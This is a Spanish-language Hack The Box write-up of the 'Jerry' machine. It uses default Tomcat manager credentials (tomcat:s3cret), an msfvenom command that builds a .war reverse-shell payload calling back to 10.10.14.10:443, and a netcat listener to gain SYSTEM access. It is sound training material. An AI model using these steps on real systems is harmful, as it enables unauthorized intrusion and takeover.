Jerry

En este artículo, vamos a estar resolviendo la máquina Jerry de la plataforma Hack The Box. Para ganar acceso al sistema, nos valdremos de una fuga de información (Information Leakage), donde se utilizan credenciales por defecto para acceder al panel administrador de aplicaciones de Tomcat. Finalmente, para ganar acceso al sistema, desplegaremos un archivo malicioso .war el cual nos enviará una reverse shell a nuestro equipo, ganando acceso al sistema como el usuario NT\Authority System.

Reconocimiento

Lanzamos una traza ICMP a la máquina víctima para comprobar que tengamos conectividad.

Vemos que responde al envío de nuestro paquete, verificando de esta manera que tenemos conectividad. Por otra parte, confirmamos que estamos frente a una máquina Windows basandonos en el TTL (Time To Live) 127.

Enumeración

Descubrimiento de puertos abiertos

Realizamos un escaneo con nmap para descubrir que puertos TCP se encuentran abiertos en la máquina víctima.

nmap -sS -p- --open --min-rate 5000 10.10.10.95 -n -Pn -oG scanPorts -vvv

Enumeración de versión y servicio

Lanzamos una serie de script básicos de enumeración propios de nmap, para conocer la versión y servicio que esta corriendo bajo los puertos abiertos.

nmap -sCV -p80 10.10.10.15 -oN targeted -vvv

Explotación

Antes de ingresar al sitio web, utilizamos la herramienta wathweb para conocer un poco las tecnologías en el stio.

Como podemos observar, se esta ejecutando un servidor Apache Tomact/7.0.88.

Si ingresamos al sitio web, podemos confirmar que se trata de una instancia del servidor web Apache Tomcat.

Accedemos a http://10.10.10.95:8080/manager/html y nos solicita credenciales.

Ingresamos contraseñas por defecto admin:admin y nada.

Pero si probamos con tomcat:s3cret (credenciales que aparecen en el ejemplo) tenemos acceso.

Explotación

Ahora que tenemos capacidad para desplegar una aplicación en Tomcat, lo que haremos es crear un archivo .war malicioso el cual nos ejecute una reverse shell a nuestro equipo.

Creamos el archivo .war con la herramienta msfvenom:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.10 LPORT=443 -f war > shell.war

Subimos el .war desde el panel de Tomcat

Nos ponemos en escucha con netcat por el puerto 443

rlwrap nc -lnvp 443

Accedemos a la ruta donde esta desplegada la aplicación

Ganamos acceo al sistema como el usuario NT\Authority System

Por ultimo, leemos los flags de user.txt y root.txt.

De esta forma, concluimos la resolución de una nueva máquina.

Espero que hayas disfrutado del contenido, y que los conceptos hayan quedado claros. En caso de tener alguna duda, te invito a realizar nuevamente la máquina para afianzar tus conocimientos.

¡Gracias por leer!

Happy Hacking!

Última actualización